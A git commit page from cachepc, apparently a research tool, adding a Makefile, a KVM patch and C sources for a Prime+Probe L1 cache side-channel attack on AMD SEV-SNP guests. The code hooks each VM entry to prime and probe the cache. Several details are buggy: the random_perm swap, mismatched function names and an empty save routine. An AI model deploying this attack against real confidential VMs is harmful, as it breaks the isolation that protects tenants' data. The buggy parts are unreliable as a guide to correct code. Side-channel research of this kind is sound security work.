Initial out-of-tree setup - cachepc - Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines

	cachepc Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
	git clone https://git.sinitax.com/sinitax/cachepc
	Log \| Files \| Refs \| Submodules \| README \| sfeed.txt

commit cee2126b8f316677ebee57e19fe7d50d09c066d1
Author: Louis Burda <quent.burda@gmail.com>
Date:   Mon,  4 Jul 2022 16:26:35 +0200

Initial out-of-tree setup

Diffstat:
A .gitignore  | 3 +++
A Makefile  | 25 +++++++++++++++++++++++++
A patch.diff  | 59 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A src/asm.h  | 72 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A src/cache_types.h  | 66 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A src/cachepc.c  | 221 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A src/cachepc.h  | 135 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A src/device_conf.h  | 29 +++++++++++++++++++++++++++++
A src/util.c  | 40 ++++++++++++++++++++++++++++++++++++++++
A src/util.h  | 9 +++++++++

10 files changed, 659 insertions(+), 0 deletions(-)
diff --git a/.gitignore b/.gitignore
@@ -0,0 +1,3 @@
+build.sh
+*.o.cmd
+*.o
diff --git a/Makefile b/Makefile
@@ -0,0 +1,25 @@
+KERNEL_SOURCE ?= /usr/src/linux
+PWD := $(shell pwd)
+
+.PHONY: all reset prepare build
+
+all: reset prepare build
+
+reset:
+	git -C $(KERNEL_SOURCE) reset --hard
+	$(MAKE) -C $(KERNEL_SOURCE) SUBDIRS=arch/x86/kvm clean
+
+prepare:
+	git -C $(KERNEL_SOURCE) apply $(PWD)/patch.diff 
+
+$(KERNEL_SOURCE)/arch/x86/kvm/svm/cachepc:
+	ln -s $(PWD)/src $@
+
+build: $(KERNEL_SOURCE)/arch/x86/kvm/svm/cachepc
+	$(MAKE) -C $(KERNEL_SOURCE) arch/x86/kvm/kvm.ko arch/x86/kvm/kvm-amd.ko
+
+load:
+	sudo rmmod kvm_amd || true
+	sudo rmmod kvm || true
+	sudo insmod $(KERNEL_SOURCE)/arch/x86/kvm/kvm.ko
+	sudo insmod $(KERNEL_SOURCE)/arch/x86/kvm/kvm-amd.ko
diff --git a/patch.diff b/patch.diff
@@ -0,0 +1,59 @@
+diff --git a/arch/x86/kvm/Makefile b/arch/x86/kvm/Makefile
+index b804444e16d4..1f7d3b15cf4a 100644
+--- a/arch/x86/kvm/Makefile
++++ b/arch/x86/kvm/Makefile
+@@ -20,7 +20,8 @@ kvm-y			+= x86.o emulate.o i8259.o irq.o lapic.o \
+ 
+ kvm-intel-y		+= vmx/vmx.o vmx/vmenter.o vmx/pmu_intel.o vmx/vmcs12.o \
+ 			   vmx/evmcs.o vmx/nested.o vmx/posted_intr.o
+-kvm-amd-y		+= svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o svm/avic.o svm/sev.o
++kvm-amd-y		+= svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o svm/avic.o svm/sev.o \
++			   svm/cachepc/cachepc.o svm/cachepc/util.o
+ 
+ obj-$(CONFIG_KVM)	+= kvm.o
+ obj-$(CONFIG_KVM_INTEL)	+= kvm-intel.o
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 7b3cfbe8f7e3..cd5cb4320a17 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -2,6 +2,8 @@
+ 
+ #include <linux/kvm_host.h>
+ 
++#include "cachepc/cachepc.h"
++
+ #include "irq.h"
+ #include "mmu.h"
+ #include "kvm_cache_regs.h"
+@@ -3728,6 +3730,16 @@ void __svm_vcpu_run(unsigned long vmcb_pa, unsigned long *regs);
+ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu,
+ 					struct vcpu_svm *svm)
+ {
++	static struct cache_ctx *ctx = NULL;
++	static struct cacheline *cache_ds = NULL;
++	static struct cacheline *curr_head = NULL;
++	static struct cacheline *next_head = NULL;
++	static int run_index = 0;
++
++	if (!ctx) ctx = cachepc_get_ctx(L1);
++	if (!cache_ds) cache_ds = cachepc_prepare_ds(ctx);
++	if (!curr_head) curr_head = cache_ds;
++
+ 	/*
+ 	 * VMENTER enables interrupts (host state), but the kernel state is
+ 	 * interrupts disabled when this is invoked. Also tell RCU about
+@@ -3751,7 +3763,13 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu,
+ 	if (sev_es_guest(svm->vcpu.kvm)) {
+ 		__svm_sev_es_vcpu_run(svm->vmcb_pa);
+ 	} else {
+-		__svm_vcpu_run(svm->vmcb_pa, (unsigned long *)&svm->vcpu.arch.regs);
++		curr_head = cachepc_prime(curr_head);
++ 		__svm_vcpu_run(svm->vmcb_pa, (unsigned long *)&svm->vcpu.arch.regs);
++		next_head = cachepc_probe(curr_head);
++		//cachepc_save_msrmt(curr_head, "/tmp/msrmt", run_index);
++		cachepc_print_msrmt(curr_head);
++		curr_head = next_head;
++		run_index += 1;
+ 
+ #ifdef CONFIG_X86_64
+ 		native_wrmsrl(MSR_GS_BASE, svm->host.gs_base);
diff --git a/src/asm.h b/src/asm.h
@@ -0,0 +1,72 @@
+#pragma once
+
+#include <linux/kernel.h>
+
+#define CPUID_AFFECTED_REGS "rax", "rbx", "rcx", "rdx"
+
+__attribute__((always_inline))
+static inline uint64_t cachepc_readpmc(uint64_t event);
+
+__attribute__((always_inline))
+static inline void cachepc_cpuid(void);
+
+__attribute__((always_inline))
+static inline void cachepc_lfence(void);
+
+__attribute__((always_inline))
+static inline void cachepc_sfence(void);
+
+__attribute__((always_inline))
+static inline void cachepc_mfence(void);
+
+uint64_t
+cachepc_readpmc(uint64_t event)
+{
+	uint32_t lo, hi;
+
+	asm volatile (
+		"mov %[event], %%rcx\t\n"
+		"rdpmc\t\n"
+		: "=a" (lo), "=d" (hi)
+		: [event] "r" (event)
+	);
+
+	return ((uint64_t) hi << 32) | lo;
+}
+
+void
+cachepc_cpuid(void)
+{
+	asm volatile(
+		"mov $0x80000005, %%eax\n\t"
+		"cpuid\n\t"
+		::: CPUID_AFFECTED_REGS
+	);
+}
+
+void
+cachepc_lfence(void)
+{
+    asm volatile(
+        "lfence\n\t"
+        ::
+    );
+}
+
+void
+cachepc_sfence(void)
+{
+    asm volatile(
+        "sfence\n\t"
+        ::
+    );
+}
+
+void
+cachepc_mfence(void)
+{
+    asm volatile(
+        "mfence\n\t"
+        ::
+    );
+}
diff --git a/src/cache_types.h b/src/cache_types.h
@@ -0,0 +1,66 @@
+#pragma once
+
+#include "device_conf.h"
+
+#include <linux/build_bug.h>
+
+#define SET_MASK(SETS) (((((uintptr_t) SETS) * CACHELINE_SIZE) - 1) ^ (CACHELINE_SIZE - 1))
+
+#define REMOVE_PAGE_OFFSET(ptr) ((void *) (((uintptr_t) ptr) & PAGE_MASK))
+
+#define GET_BIT(b, i) (((b & (1 << i)) >> i) & 1)
+#define SET_BIT(b, i) (b | (1 << i))
+
+/* Operate cacheline flags
+ * Used flags:
+ *  32                    2              1       0
+ * |  | ... | cache group initialized | last | first |
+ */
+#define DEFAULT_FLAGS 0
+#define SET_FIRST(flags) SET_BIT(flags, 0)
+#define SET_LAST(flags) SET_BIT(flags, 1)
+#define SET_CACHE_GROUP_INIT(flags) SET_BIT(flags, 2)
+#define IS_FIRST(flags) GET_BIT(flags, 0)
+#define IS_LAST(flags) GET_BIT(flags, 1)
+#define IS_CACHE_GROUP_INIT(flags) GET_BIT(flags, 2)
+
+// Offset of the next and prev field in the cacheline struct
+#define CL_NEXT_OFFSET 0
+#define CL_PREV_OFFSET 8
+
+typedef enum cache_level cache_level;
+typedef enum addressing_type addressing_type;
+typedef struct cacheline cacheline;
+typedef struct cache_ctx cache_ctx;
+
+enum cache_level {L1, L2};
+enum addressing_type {VIRTUAL, PHYSICAL};
+
+struct cache_ctx {
+    cache_level cache_level;
+    addressing_type addressing;
+
+    uint32_t sets;
+    uint32_t associativity;
+    uint32_t access_time;
+    uint32_t nr_of_cachelines;
+    uint32_t set_size;
+    uint32_t cache_size;
+};
+
+struct cacheline {
+    // Doubly linked list inside same set
+    // Attention: CL_NEXT_OFFSET and CL_PREV_OFFSET
+    // must be kept up to date
+    cacheline *next;
+    cacheline *prev;
+
+    uint16_t cache_set;
+    uint16_t flags;
+
+    // Unused padding to fill cache line
+    uint64_t count;
+    char padding[32];
+};
+
+static_assert(sizeof(struct cacheline) == CACHELINE_SIZE, "Bad cache line struct size");
diff --git a/src/cachepc.c b/src/cachepc.c
@@ -0,0 +1,221 @@
+#include "cachepc.h"
+
+static cacheline *build_cache_ds(cache_ctx *ctx, cacheline **cacheline_ptr_arr);
+static void build_randomized_list_for_cache_set(cache_ctx *ctx, cacheline **cacheline_ptr_arr);
+static cacheline **allocate_cache_ds(cache_ctx *ctx);
+static uint16_t get_virt_cache_set(cache_ctx *ctx, void *ptr);
+static void *aligned_alloc(size_t alignment, size_t size);
+
+cache_ctx *
+get_cache_ctx(cache_level cache_level)
+{
+	cache_ctx *ctx;
+       
+	ctx = kzalloc(sizeof(cache_ctx), GFP_KERNEL);
+	BUG_ON(ctx == NULL);
+
+	if (cache_level == L1) {
+		ctx->addressing = L1_ADDRESSING;
+		ctx->sets = L1_SETS;
+		ctx->associativity = L1_ASSOCIATIVITY;
+		ctx->access_time = L1_ACCESS_TIME;
+	} else if (cache_level == L2) {
+		ctx->addressing = L2_ADDRESSING;
+		ctx->sets = L2_SETS;
+		ctx->associativity = L2_ASSOCIATIVITY;
+		ctx->access_time = L2_ACCESS_TIME;
+	} else {
+		return NULL;
+	}
+
+	ctx->cache_level = cache_level;
+	ctx->nr_of_cachelines = ctx->sets * ctx->associativity;
+	ctx->set_size = CACHELINE_SIZE * ctx->associativity;
+	ctx->cache_size = ctx->sets * ctx->set_size;
+
+	return ctx;
+}
+
+/*
+ * Initialises the complete cache data structure for the given context
+ */
+cacheline *
+cachepc_prepare_ds(cache_ctx *ctx)
+{
+	cacheline **cacheline_ptr_arr;
+	cacheline *cache_ds;
+	
+       	cacheline_ptr_arr = allocate_cache_ds(ctx);
+	cache_ds = build_cache_ds(ctx, cacheline_ptr_arr);
+	kfree(cacheline_ptr_arr);
+
+	return cache_ds;
+}
+
+void
+cachepc_save_msrmt(cacheline *head, const char *prefix, int index)
+{
+	char filename[256];
+
+	snprintf(filename, sizeof(filename), "%s.%i", prefix, index);
+
+}
+
+void
+cache_print_msrmts(cacheline *head)
+{
+	cacheline *curr_cl;
+
+	curr_cl = head;
+	do {
+		if (IS_FIRST(curr_cl->flags)) {
+			printk(KERN_WARNING "Count for cache set %i: %llu\n",
+				curr_cl->cache_set, curr_cl->count);
+		}
+
+		curr_cl = curr_cl->prev;
+	} while (curr_cl != head);
+}
+
+/*
+ * Create a randomized doubly linked list with the following structure:
+ * set A <--> set B <--> ... <--> set X <--> set A
+ * where each set is one of the cache sets, in a random order.
+ * The sets are a doubly linked list of cachelines themselves:
+ * set A:
+ *  line[A + x0 * #sets] <--> line[A + x1 * #sets] <--> ...
+ * where x0, x1, ..., xD is a random permutation of 1, 2, ..., D
+ * and D = Associativity = | cache set |
+ */
+cacheline *build_cache_ds(cache_ctx *ctx, cacheline **cl_ptr_arr) {
+	cacheline **cl_ptr_arr_sorted;
+	cacheline *curr_cl, *next_cl;
+	cacheline *cache_ds;
+	uint32_t *idx_per_set;
+	uint32_t idx_curr_set, set_offset;
+	uint32_t i, j, set, set_len;
+	uint32_t *idx_map;
+
+ 	idx_per_set = kzalloc(ctx->sets * sizeof(uint32_t), GFP_KERNEL);
+	BUG_ON(idx_per_set == NULL);
+
+	cl_ptr_arr_sorted  = kmalloc(ctx->nr_of_cachelines * sizeof(cacheline *), GFP_KERNEL);
+	BUG_ON(cl_ptr_arr_sorted == NULL);
+
+	set_len = ctx->associativity;
+	for (i = 0; i < ctx->nr_of_cachelines; ++i) {
+		set_offset      = cl_ptr_arr[i]->cache_set * set_len;
+		idx_curr_set    = idx_per_set[cl_ptr_arr[i]->cache_set];
+
+		cl_ptr_arr_sorted[set_offset + idx_curr_set] = cl_ptr_arr[i];
+		idx_per_set[cl_ptr_arr[i]->cache_set] += 1;
+	}
+
+	// Build doubly linked list for every set
+	for (set = 0; set < ctx->sets; ++set) {
+		set_offset = set * set_len;
+		build_randomized_list_for_cache_set(ctx, cl_ptr_arr_sorted + set_offset);
+	}
+
+	// Relink the sets among each other
+	idx_map = kzalloc(ctx->sets * sizeof(uint32_t), GFP_KERNEL);
+	BUG_ON(idx_map == NULL);
+
+	gen_random_indices(idx_map, ctx->sets);
+
+	curr_cl = cl_ptr_arr_sorted[idx_map[0] * set_len]->prev;
+	for (j = 0; j < ctx->sets; ++j) {
+		curr_cl->next = cl_ptr_arr_sorted[idx_map[(j + 1) % ctx->sets] * set_len];
+		next_cl = curr_cl->next->prev;
+		curr_cl->next->prev = curr_cl;
+		curr_cl = next_cl;
+	}
+
+	cache_ds = cl_ptr_arr_sorted[idx_map[0] * set_len];
+
+	kfree(cl_ptr_arr_sorted);
+	kfree(idx_per_set);
+	kfree(idx_map);
+
+	return cache_ds;
+}
+
+/*
+ * Helper function to build a randomised list of cacheline structs for a set
+ */
+void build_randomized_list_for_cache_set(cache_ctx *ctx, cacheline **cacheline_ptr_arr)
+{
+	cacheline *curr_cl;
+	uint32_t len, *idx_map;
+	uint16_t i;
+
+	len = ctx->associativity;
+	idx_map = kzalloc(len * sizeof(uint32_t), GFP_KERNEL);
+	BUG_ON(idx_map == NULL);
+
+	gen_random_indices(idx_map, len);
+
+	for (i = 0; i < len; ++i) {
+		curr_cl = cacheline_ptr_arr[idx_map[i]];
+		curr_cl->next = cacheline_ptr_arr[idx_map[(i + 1) % len]];
+		curr_cl->prev = cacheline_ptr_arr[idx_map[(len - 1 + i) % len]];
+		curr_cl->count = 0;
+
+		if (curr_cl == cacheline_ptr_arr[0]) {
+			curr_cl->flags       = SET_FIRST(DEFAULT_FLAGS);
+			curr_cl->prev->flags = SET_LAST(DEFAULT_FLAGS);
+		} else {
+			curr_cl->flags = curr_cl->flags | DEFAULT_FLAGS;
+		}
+	}
+
+	kfree(idx_map);
+}
+
+/*
+ * Allocate a data structure that fills the complete cache, i.e. consisting
+ * of `associativity` many cache lines for each cache set.
+ */
+cacheline **
+allocate_cache_ds(cache_ctx *ctx)
+{
+	cacheline **cl_ptr_arr, *cl_arr;
+	uint32_t i;
+
+	cl_ptr_arr = (cacheline **) kzalloc(ctx->nr_of_cachelines * sizeof(cacheline *), GFP_KERNEL);
+	BUG_ON(cl_ptr_arr == NULL);
+
+	BUG_ON(ctx->addressing != VIRTUAL);
+
+	// For virtual addressing, allocating a consecutive chunk of memory is enough
+	cl_arr = (cacheline *) aligned_alloc(PAGE_SIZE, ctx->cache_size);
+	BUG_ON(cl_arr == NULL);
+
+	for (i = 0; i < ctx->nr_of_cachelines; ++i) {
+		cl_ptr_arr[i] = cl_arr + i;
+		cl_ptr_arr[i]->cache_set = get_virt_cache_set(ctx, cl_ptr_arr[i]);
+	}
+
+	return cl_ptr_arr;
+}
+
+uint16_t
+get_virt_cache_set(cache_ctx *ctx, void *ptr)
+{
+	return (uint16_t) ((((uintptr_t) ptr) & SET_MASK(ctx->sets)) / CACHELINE_SIZE);
+}
+
+void *
+aligned_alloc(size_t alignment, size_t size)
+{
+	void *p;
+
+	if (size % alignment != 0)
+		size = size - (size % alignment) + alignment;
+	p = kmalloc(size, GFP_KERNEL);
+	BUG_ON(((uintptr_t) p) % alignment != 0);
+
+	return p;
+}
+
+
diff --git a/src/cachepc.h b/src/cachepc.h
@@ -0,0 +1,135 @@
+#pragma once
+
+#include <linux/kernel.h>
+#include <linux/types.h> 
+#include <linux/slab.h>
+
+#include "asm.h"
+#include "cache_types.h"
+#include "util.h"
+
+cache_ctx *cachepc_get_ctx(cache_level cl);
+cacheline *cachepc_prepare_ds(cache_ctx *ctx);
+void cachepc_save_msrmt(cacheline *head, const char *prefix, int index);
+void cachepc_print_msrmt(cacheline *head);
+
+__attribute__((always_inline))
+static inline cacheline *cachepc_prime(cacheline *head);
+
+__attribute__((always_inline))
+static inline cacheline *cachepc_prime_rev(cacheline *head);
+
+__attribute__((always_inline))
+static inline cacheline *cachepc_probe_set(cacheline *curr_cl);
+
+__attribute__((always_inline))
+static inline cacheline *cachepc_probe(cacheline *head);
+
+/*
+ * Prime phase: fill the target cache (encoded in the size of the data structure)
+ * with the prepared data structure, i.e. with attacker data.
+ */
+static inline cacheline *
+cachepc_prime(cacheline *head)
+{
+    cacheline *curr_cl;
+
+    cachepc_cpuid();
+    curr_cl = head;
+    do {
+        curr_cl = curr_cl->next;
+        cachepc_mfence();
+    } while(curr_cl != head);
+    cachepc_cpuid();
+
+    return curr_cl->prev;
+}
+
+/*
+ * Same as prime, but in the reverse direction, i.e. the same direction that probe
+ * uses. This is beneficial for the following scenarios:
+ *     - L1:
+ *         - Trigger collision chain-reaction to amplify an evicted set (but this has
+ *           the downside of more noisy measurements).
+ *     - L2:
+ *         - Always use this for L2, otherwise the first cache sets will still reside
+ *           in L1 unless the victim filled L1 completely. In this case, an eviction
+ *           has randomly (depending on where the cache set is placed in the randomised
+ *           data structure) the following effect:
+ *             A) An evicted set is L2_ACCESS_TIME - L1_ACCESS_TIME slower
+ *             B) An evicted set is L3_ACCESS_TIME - L2_ACCESS_TIME slower
+ */
+static inline cacheline *
+cachepc_prime_rev(cacheline *head)
+{
+    cacheline *curr_cl;
+
+    cachepc_cpuid();
+    curr_cl = head;
+    do {
+        curr_cl = curr_cl->prev;
+        cachepc_mfence();
+    } while(curr_cl != head);
+    cachepc_cpuid();
+
+    return curr_cl->prev;
+}
+
+static inline cacheline *
+cachepc_probe_set(cacheline *curr_cl)
+{
+	uint64_t pre1, pre2, pre3;
+	uint64_t post1, post2, post3;
+	cacheline *next_cl;
+
+	pre1 = cachepc_readpmc(0);
+	pre2 = cachepc_readpmc(1);
+	pre3 = cachepc_readpmc(2);
+
+	cachepc_mfence();
+	asm volatile(
+		"mov 8(%[curr_cl]), %%rax \n\t"              // +8
+		"mov 8(%%rax), %%rcx \n\t"                   // +16
+		"mov 8(%%rcx), %%rax \n\t"                   // +24
+		"mov 8(%%rax), %%rcx \n\t"                   // +32
+		"mov 8(%%rcx), %%rax \n\t"                   // +40
+		"mov 8(%%rax), %%rcx \n\t"                   // +48
+		"mov 8(%%rcx), %[curr_cl_out] \n\t"          // +56
+		"mov 8(%[curr_cl_out]), %[next_cl_out] \n\t" // +64
+		: [next_cl_out] "=r" (next_cl),
+		  [curr_cl_out] "=r" (curr_cl)
+		: [curr_cl] "r" (curr_cl)
+		: "rax", "rcx"
+	);
+	cachepc_mfence();
+	cachepc_cpuid();
+
+	post1 = cachepc_readpmc(0);
+	cachepc_cpuid();
+	post2 = cachepc_readpmc(1);
+	cachepc_cpuid();
+	post3 = cachepc_readpmc(2);
+	cachepc_cpuid();
+
+	/* works across size boundary */
+	curr_cl->count = 0;
+	curr_cl->count += post1 - pre1;
+	curr_cl->count += post2 - pre2;
+	curr_cl->count += post3 - pre3;
+
+	return next_cl;
+}
+
+static inline cacheline *
+cachepc_probe(cacheline *head)
+{
+	cacheline *curr_cs;
+       
+	curr_cs = head;
+	do {
+		curr_cs = cachepc_probe_set(curr_cs);
+	} while (__builtin_expect(curr_cs != head, 1));
+
+	return curr_cs->next;
+}
+
diff --git a/src/device_conf.h b/src/device_conf.h
@@ -0,0 +1,29 @@
+#pragma once
+
+// TODO: Read from kernel headers
+
+// General settings
+// #define PAGE_SIZE 4096
+#define PROCESSOR_FREQ 2900000000
+
+// Cache related settings
+#define CACHELINE_SIZE 64
+#define CACHE_GROUP_SIZE (PAGE_SIZE / CACHELINE_SIZE)
+
+// Addressing:
+// - virtual:   0
+// - physical:  1
+#define L1_ADDRESSING 0
+#define L1_SETS 64
+#define L1_ASSOCIATIVITY 8
+#define L1_ACCESS_TIME 4
+
+#define L2_ADDRESSING 1
+#define L2_SETS 512
+#define L2_ASSOCIATIVITY 8
+#define L2_ACCESS_TIME 12
+
+#define L3_ADDRESSING 1
+#define L3_SETS 4096
+#define L3_ASSOCIATIVITY 16
+#define L3_ACCESS_TIME 30
diff --git a/src/util.c b/src/util.c
@@ -0,0 +1,40 @@
+#include "util.h"
+
+#include <linux/random.h>
+
+void
+random_perm(uint32_t *arr, uint32_t arr_len)
+{
+	uint32_t i, idx, tmp;
+
+	for (i = arr_len - 1; i > 0; --i) {
+		get_random_bytes(&idx, 4);
+		idx = idx % i;
+
+		tmp = arr[idx];
+		arr[i] = arr[idx];
+		arr[idx] = tmp;
+	}
+}
+
+void
+gen_random_indices(uint32_t *arr, uint32_t arr_len)
+{
+	uint32_t i;
+
+	for (i = 0; i < arr_len; ++i)
+		arr[i] = i;
+	random_perm(arr, arr_len);
+}
+
+
+bool is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len) {
+	uint32_t i;
+
+	for (i = 0; i < arr_len; ++i) {
+		if (arr[i] == elem)
+			return true;
+	}
+
+	return false;
+}
diff --git a/src/util.h b/src/util.h
@@ -0,0 +1,9 @@
+#pragma once 
+
+#include <linux/kernel.h>
+
+void gen_rand_bytes(unsigned char *arr, uint32_t arr_len);
+void random_perm(uint32_t *arr, uint32_t arr_len);
+void gen_random_indices(uint32_t *arr, uint32_t arr_len);
+
+bool is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len);

A	.gitignore	\|	3	+++
A	Makefile	\|	25	+++++++++++++++++++++++++
A	patch.diff	\|	59	+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A	src/asm.h	\|	72	++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A	src/cache_types.h	\|	66	++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A	src/cachepc.c	\|	221	+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A	src/cachepc.h	\|	135	+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A	src/device_conf.h	\|	29	+++++++++++++++++++++++++++++
A	src/util.c	\|	40	++++++++++++++++++++++++++++++++++++++++
A	src/util.h	\|	9	+++++++++